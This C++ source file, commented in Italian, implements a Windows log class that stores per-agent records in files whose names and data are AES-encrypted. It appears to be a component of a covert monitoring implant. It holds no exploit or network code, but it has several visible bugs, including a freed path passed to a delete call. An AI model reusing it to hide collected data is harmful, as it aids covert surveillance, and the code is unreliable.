#include <vector>
#include <string.h>

using namespace std;

#include "Log.h"

Log::Log() : wName(NULL), wEncName(NULL), encryptionObj(NULL), hFile(INVALID_HANDLE_VALUE), pLogSnapshot(NULL){
	encryptionObj = new Encryption(g_AesKey, 128);
}

BOOL Log::WriteLog(UINT Id, UINT Type, UINT Seq, BYTE* pByte, UINT uLen, UINT uAdditional) {
	LogStruct LogDescription;
	SYSTEMTIME st;
	FILETIME ft;
	UINT t_seq = 0;
	UINT len = 8 + 1 + 8 + 1 + 4 + 4 + 1;	// 8 per l'id, 8 per il tipo, 4 per la sequenza, 
											// 4 per l'ext e 1 per il NULL, gli altri sono i trattini
	DWORD dwWritten;
	WCHAR *completeName = NULL;

	if(hFile != INVALID_HANDLE_VALUE){
		CloseLog();
	}

	if(wName){
		delete[] wName;
		wName = NULL;
	}

	t_seq = Seq;

	wName = new(std::nothrow) WCHAR[len];

	if(wName == NULL)
		return FALSE;
	
	memset(wName, 0x00, sizeof(WCHAR) * len);

	// Il file non dovrebbe esistere, ma nel caso effettuiamo un loop fino a trovare
	// un posticino per questo log.
	while(1){
		wsprintf(wName, L"%x-%x-%d.bin", Id, Type, t_seq);
		wEncName = encryptionObj->EncryptName(wName, g_AesKey[0]);

		if(wEncName == NULL)
			return FALSE;

		completeName = GetCurrentPath(wEncName);

		if(completeName == NULL){
			free(wEncName);
			return FALSE;
		}

		hFile = CreateFile(completeName, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

		if(hFile == INVALID_HANDLE_VALUE){
			break;
		}

		if(completeName){
			delete[] completeName;
			completeName = NULL;
		}

		CloseHandle(hFile); // Chiudo il file e libero wEncName
		t_seq++;
	}

	hFile = CreateFile(completeName, GENERIC_WRITE, FILE_SHARE_READ, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
	
	if(completeName){
		delete[] completeName;
		completeName = NULL;
	}

	if(hFile == INVALID_HANDLE_VALUE){
		CloseLog();
		return FALSE;
	}

	GetSystemTime(&st);
	SystemTimeToFileTime(&st, &ft);

	// Riempiamo i membri della struttura
	LogDescription.cbSize = sizeof(LogStruct);
	LogDescription.uVersion = LOG_VERSION_01;
	LogDescription.uLogType = Id; // Id dell'agente
	LogDescription.uHTimestamp = ft.dwHighDateTime;
	LogDescription.uLTimestamp = ft.dwLowDateTime;
	LogDescription.FileNameLength = wcslen(wEncName) * sizeof(WCHAR);
	LogDescription.uAdditionalData = uAdditional;
	LogDescription.FileSize = 0; // Per sicurezza lo scriviamo solo dopo la cifratura

	// Scrivi l'header nel file
	if(WriteFile(hFile, (BYTE *)&LogDescription, sizeof(LogStruct), &dwWritten, NULL) == FALSE){
		CloseLog();
		RemoveLog(completeName);
		return FALSE;
	}

	// Scriviamo il nome del file
	if(WriteFile(hFile, (BYTE *)wEncName, LogDescription.FileNameLength, &dwWritten, NULL) == FALSE){
		CloseLog();
		RemoveLog(completeName);
		return FALSE;
	}

	// Scriviamo i dati addizionali, se presenti (li prendiamo dal buffer pByte)
	if(LogDescription.uAdditionalData){
		if(WriteFile(hFile, (BYTE *)pByte, LogDescription.uAdditionalData, &dwWritten, NULL) == FALSE){
			CloseLog();
			RemoveLog(completeName);
			return FALSE;
		}

		pByte += LogDescription.uAdditionalData;
	}

	// Cifra i byte e scrivili
	UINT t_len = uLen;
	BYTE* encrypted = NULL;
	encrypted = encryptionObj->EncryptData(pByte, &t_len);

	if(encrypted == NULL){
		CloseLog();
		RemoveLog(completeName);
		return FALSE;
	}

	// Scriviamo la dword che identifica la quantita' di byte nel file
	if(WriteFile(hFile, (BYTE *)&t_len, sizeof(UINT), &dwWritten, NULL) == FALSE){
		delete[] encrypted;
		CloseLog();
		RemoveLog(completeName);
		return FALSE;
	}

	// E poi i dati cifrati
	if(WriteFile(hFile, encrypted, t_len, &dwWritten, NULL) == FALSE){
		delete[] encrypted;
		CloseLog();
		RemoveLog(completeName);
		return FALSE;
	}

	// Aggiorniamo quindi la dimensione del file nella struttura
	UINT offset = 0;

	if(LogDescription.uVersion == LOG_VERSION_01)
		offset = sizeof(UINT) * 5; // Skippiamo i primi 5 membri della struttura

	SetFilePointer(hFile, offset, 0, FILE_BEGIN);

	if(WriteFile(hFile, (BYTE *)&offset, sizeof(UINT), &dwWritten, NULL) == FALSE){
		delete[] encrypted;
		CloseLog();
		RemoveLog(completeName);
		return FALSE;
	}

	delete[] encrypted;
	CloseLog();
	return TRUE;
}

BOOL Log::AppendLog(UINT Id, UINT Type, UINT Seq, BYTE* pByte, UINT uLen) {
	UINT t_seq = 0;
	UINT len = 8 + 1 + 8 + 1 + 4 + 4 + 1;	// 8 per l'id, 8 per il tipo, 4 per la sequenza, 
	// 4 per l'ext e 1 per il NULL, gli altri sono i trattini
	DWORD dwWritten;
	WCHAR *completeName = NULL;

	if(hFile != INVALID_HANDLE_VALUE){
		CloseHandle(hFile);
		hFile = INVALID_HANDLE_VALUE;
	}

	t_seq = Seq;

	if(wName == NULL){
		wName = new(std::nothrow) WCHAR[len];

		if(wName == NULL)
			return FALSE;

		if(wEncName){
			free(wEncName);
			wEncName = NULL;
		}

		memset(wName, 0x00, sizeof(WCHAR) * len);
		wsprintf(wName, L"%x-%x-%d.bin", Id, Type, t_seq);
		wEncName = encryptionObj->EncryptName(wName, g_AesKey[0]);
	}

	completeName = GetCurrentPath(wEncName);

	if(completeName == NULL){
		CloseLog();
		return FALSE;
	}

	hFile = CreateFile(completeName, GENERIC_WRITE | GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

	if(hFile == INVALID_HANDLE_VALUE){
		CloseLog();
		delete[] completeName;
		return FALSE;
	}

	delete[] completeName;

	// Spostati alla fine del file
	SetFilePointer(hFile, 0, 0, FILE_END);

	// Cifra i byte e scrivili
	UINT t_len = uLen;
	BYTE* encrypted = NULL;
	encrypted = encryptionObj->EncryptData(pByte, &t_len);

	if(encrypted == NULL){
		CloseLog();
		return FALSE;
	}

	// Scriviamo la dword che identifica la quantita' di byte (unpaddati) nel nel blocco
	if(WriteFile(hFile, (BYTE *)&uLen, sizeof(UINT), &dwWritten, NULL) == FALSE){
		delete[] encrypted;
		CloseLog();
		return FALSE;
	}

	// E poi i dati cifrati
	if(WriteFile(hFile, encrypted, t_len, &dwWritten, NULL) == FALSE){
		delete[] encrypted;
		CloseLog();
		return FALSE;
	}

	// Spostiamoci di nuovo all'inizio del file ed aggiorniamo la dimensione totale,
	// calcoliamo l'offset dal primo byte
	UINT offset = 0, version = 0;

	// Leggiamo la versione di log
	SetFilePointer(hFile, 4, 0, FILE_BEGIN);
	ReadFile(hFile, &version, sizeof(UINT), &dwWritten, NULL);

	switch(version){
		case LOG_VERSION_01:
			offset = sizeof(UINT) * 5; // Skippiamo i primi 5 membri della struttura
			break;
		default:
			offset = sizeof(UINT) * 5;
			break;
	}

	SetFilePointer(hFile, offset, 0, FILE_BEGIN);

	// Aggiorniamo la dimensione
	offset = GetFileSize(hFile, NULL);
	if(WriteFile(hFile, (BYTE *)&offset, sizeof(UINT), &dwWritten, NULL) == FALSE){
		delete[] encrypted;
		CloseLog();
		return FALSE;
	}

	delete[] encrypted;
	CloseLog();
	return TRUE;
}

BOOL Log::CloseLog() {
	if(hFile != INVALID_HANDLE_VALUE){
		CloseHandle(hFile);
		hFile = INVALID_HANDLE_VALUE;
	}

	if(wName){
		delete[] wName;
		wName = NULL;
	}

	if(wEncName){
		free(wEncName);
		wEncName = NULL;
	}

	return TRUE;
}

BOOL Log::RemoveLog(WCHAR* wLogName) {
	return DeleteFile(wLogName);
}

list<WCHAR*>* Log::ListLogs() {
	WIN32_FIND_DATA fd;
	list<WCHAR *> *logs = NULL;
	HANDLE hList = INVALID_HANDLE_VALUE;
	WCHAR *ext, *search, *tmp;

	logs = new(std::nothrow) list<WCHAR *>;
	logs->clear();

	if(logs == NULL)
		return NULL;

	ext = encryptionObj->EncryptName(LOG_EXTENSION, g_AesKey[0]);

	if(ext == NULL){
		logs->clear();
		delete logs;
		return NULL;
	}

	search = new(std::nothrow) WCHAR[1 + wcslen(LOG_EXTENSION) + 1];
	memset(search, 0x00, sizeof(WCHAR) * (1 + wcslen(LOG_EXTENSION) + 1));

	if(search == NULL){
		logs->clear();
		delete logs;
		free(ext);
		return NULL;
	}

	search[0] = '*';
	wcscat_s(search, 1 + wcslen(LOG_EXTENSION) + 1, ext);

	hList = FindFirstFile(search, &fd);

	if(hList == INVALID_HANDLE_VALUE){
		logs->clear();
		free(ext);
		delete[] search;
		return NULL;
	}

	tmp = new(std::nothrow) WCHAR[wcslen(fd.cFileName) + 1];

	if(tmp == NULL){
		logs->clear();
		free(ext);
		delete[] search;
		FindClose(hList);
		return NULL;
	}

	memset(tmp, 0x00, sizeof(WCHAR) * (wcslen(fd.cFileName) + 1));
	memcpy(tmp, fd.cFileName, sizeof(WCHAR) * wcslen(fd.cFileName));
	logs->push_back(tmp);

	while(FindNextFile(hList, &fd)){
		tmp = new(std::nothrow) WCHAR[wcslen(fd.cFileName) + 1];

		if(tmp == NULL){
			// XXX - andrebbe cancellata la memoria allocata dentro log prima di ritornare
			logs->clear();
			free(ext);
			delete[] search;
			FindClose(hList);
			return NULL;
		}

		memset(tmp, 0x00, sizeof(WCHAR) * (wcslen(fd.cFileName) + 1));
		memcpy(tmp, fd.cFileName, sizeof(WCHAR) * wcslen(fd.cFileName));
		logs->push_back(tmp);
	}

	free(ext);
	delete[] search;
	FindClose(hList);
	return logs;
}

BOOL Log::MakeLogSnapshot() {
	list<WCHAR *>::iterator iter;

	// Liberiamo il precedente snapshot se esiste
	if(pLogSnapshot != NULL){
		for(iter = pLogSnapshot->begin(); iter != pLogSnapshot->end(); iter++)
			delete[] (*iter);

		pLogSnapshot->clear();
		delete pLogSnapshot;
		pLogSnapshot = NULL;
	}

	pLogSnapshot = ListLogs();

	if(pLogSnapshot == NULL)
		return FALSE;

	return TRUE;
}

list<WCHAR*>* Log::GetLogSnapshot() {
	return pLogSnapshot;
}

Log::~Log() {
	list<WCHAR *>::iterator iter;

	CloseLog();

	if(pLogSnapshot != NULL){
		for(iter = pLogSnapshot->begin(); iter != pLogSnapshot->end(); iter++)
			delete[] (*iter);

		pLogSnapshot->clear();
		delete pLogSnapshot;
		pLogSnapshot = NULL;
	}

	if(encryptionObj)
		delete encryptionObj;
}
